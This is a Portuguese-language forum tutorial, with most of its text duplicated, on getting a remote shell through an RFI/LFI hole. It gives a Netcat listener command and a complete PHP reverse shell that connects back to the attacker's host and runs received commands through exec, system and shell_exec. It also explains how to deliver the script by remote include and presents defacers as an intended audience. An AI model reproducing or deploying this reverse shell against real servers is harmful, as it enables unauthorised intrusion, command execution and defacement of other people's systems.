Quando descobrimos uma vulnerabilidade do tipo RFI/LFI vemos que às vezes a inclusão de verdadeiras shells em PHP torna-se lento e pesado e incluir scripts diretos com funções de substituição de conteúdo de arquivo torna-se cansativo, pois devemos ficar alterando o conteúdo a qualquer erro.
Mas ainda bem que existe o NetCat.
O canivete suíço do TCP/IP já vem instalado na maioria das distros Linux, mas possui versões para Windows. BaixeApenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Apesar de muito utilizado por alguns para acessarem prompts de comandos e brincar com o comando msg * [mensagem], pode ser utilizado também por defacers.
Mas, para isso, precisamos já ter instalado o NetCat e rodar o seguinte comando:
Agora precisamos, de alguma forma, executar este script no servidor, seja via LFI/RFI (PHPi), seja por upload de shell ou qualquer outra forma possível.
Analisando o script, veja que executamos o comando 3 vezes, usando diferentes funções. Além disso, note que a porta utilizada é a 30000. Caso queira modificá-la, modifique no script acima e no comando do NetCat anteriormente executado.
Agora, execute o script. Lembre-se que se for usar um include remoto, a extensão do arquivo PHP em seu servidor deve ser TXT, HTML ou qualquer outra que passe ileso do interpretador, ou você estará invadindo seu próprio servidor.
Agora, volte ao shell ou prompt e espere pela frase "Olá, meu mestre.". Aparecendo ela, que se comecem os comandos. Lembrando que variam de acordo com o sistema operacional do servidor. Note que a página onde o script está sendo executado fica carregando em loop. Quando a conexão for desfeita, pelo fechamento do shell/prompt, ela irá parar de carregar e mostrar os resultados de todos os comandos (os mesmos rodados no console).
Até a próxima!
Mas ainda bem que existe o NetCat.
O canivete suíço do TCP/IP já vem instalado na maioria das distros Linux, mas possui versões para Windows. BaixeApenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Apesar de muito utilizado por alguns para acessarem prompts de comandos e brincar com o comando msg * [mensagem], pode ser utilizado também por defacers.
Mas, para isso, precisamos já ter instalado o NetCat e rodar o seguinte comando:
Código:
nc -l -p 30000 -v
Código PHP:
<?php
$voce = "voce.no-ip.com"; // coloque aqui seu IP ou DNS do No-IP ou domínio
$porta = 30000; // porta a conectar
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$result = socket_connect($sock, $voce, $porta);
socket_write($sock, "Olá, meu mestre.\n\nphp$", 15);
while ($out = socket_read($sock, 4096))
{
exec($out, $cmd);
$cmdb = system($out);
$cmdc = shell_exec($out);
$cmdresult = implode("\n", $cmd) . $cmdb . $cmdc . "\nComando executado com sucesso!\nphp$ ";
echo $cmdresult;
socket_write($sock, $cmdresult, strlen($cmdresult));
}
socket_close($sock);
Agora, execute o script. Lembre-se que se for usar um include remoto, a extensão do arquivo PHP em seu servidor deve ser TXT, HTML ou qualquer outra que passe ileso do interpretador, ou você estará invadindo seu próprio servidor.
Agora, volte ao shell ou prompt e espere pela frase "Olá, meu mestre.". Aparecendo ela, que se comecem os comandos. Lembrando que variam de acordo com o sistema operacional do servidor. Note que a página onde o script está sendo executado fica carregando em loop. Quando a conexão for desfeita, pelo fechamento do shell/prompt, ela irá parar de carregar e mostrar os resultados de todos os comandos (os mesmos rodados no console).
Até a próxima!